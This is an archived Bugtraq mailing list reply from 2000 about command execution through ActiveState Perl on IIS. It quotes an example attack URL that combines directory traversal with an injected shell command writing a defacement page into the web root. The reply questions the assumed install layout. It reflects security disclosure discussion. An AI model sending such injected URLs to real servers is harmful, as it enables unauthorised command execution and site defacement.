Bugtraq mailing list archives
Re: Filename Inspection+Perl can Executing commands
From: Tom Geldner <tom () XOR CC>
Date: Thu, 7 Dec 2000 21:53:22 -0800
----- Original Message ----- From: "Billy Nothern" <disk_key () HOTMAIL COM> Here is an example URL an attacker could use: http://host/."./."./Perl/eg/core/findtar+&+echo+hacked+>+c:\InetPub\ww wroot\hacked.html+&+.pl The whole discussion was interesting but speaking as a site the runs ActiveState Perl, the assumptive directory layout you've outlined doesn't seem correct. (Regardless, we don't have findtar in our Perl libs.) lib/core is what I've seen. Is this exploit specific to a particular install or version of AS Perl for IIS? Tom
Current thread:
- Filename Inspection+Perl can Executing commands Billy Nothern (Dec 08)
- Re: Filename Inspection+Perl can Executing commands Tom Geldner (Dec 11)